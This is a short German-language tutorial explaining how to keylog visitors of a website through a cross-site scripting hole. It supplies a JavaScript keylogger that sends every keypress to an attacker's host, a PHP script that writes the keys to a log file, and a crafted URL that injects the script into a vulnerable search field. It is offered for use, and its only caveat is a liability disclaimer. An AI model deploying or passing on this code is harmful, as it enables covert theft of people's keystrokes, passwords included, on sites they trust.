Ich hafte für nichts und distanziere mich von jeglichen Schaden der durch dieses Tutorial entsteht
Ich möchte euch in diesem kleinen Tutorial zeigen wie man einen Benutzer per XSS keyloggen kann. Falls ihr euch noch nicht richtig mit XSS beschäftigt habt empfehle ich euch erst andere Tutorials zu lesen.
Vorbereitungen
Wir brauchen einen Web-Hoster diesen Hoster brauchen wir um 2 Skripte hochzuladen ein PHP & Javascript und einen FTP-Client. Das Javascript Skript zum keyloggen und das PHP Skript zum speichern des Logs. Gibt allen Files die permission 777 für die Schreibrechte.
Javascript-Skript
document.onkeypress = function(evt) { evt = evt || window.event; key = String.fromCharCode(evt.charCode); if (key) { var http = new XMLHttpRequest(); var param = encodeURI(key); http.open("POST", "WEBHOSTER+PHPSKRIPT"); http.setRequestHeader("Content-type", application/x-www-form-urlencoded"); http.send("key="+param); } }In Zeile 7 muss die URL angegeben werden wo ihr euer PHP-Skript hochgeladen habt.
PHP-Skript
<?php $key = $_POST["key"]; $logfile = "log.txt"; $fp = fopen($logfile, "a"); fwrite($fp, $key); fclose($fp); ?>
Fast fertig
Jetzt modifiziert ihr eure URL
www.beispielSeiteMitXSSLücke.de/index.php?search=<script src="URL_DER_Javascript_DATEI"></script>
Die Logs sind nur auf dem Formular mit der XSS-Lücke. Alle Tastenanschläge werden in der "logs.txt" auf dem Web-Hoster gespeichert.
MFG Iron
---------------------------------------------------------------------------------------------
Quellen: http://www.toolbase....__hl__keylogger
Javascript-Keylogger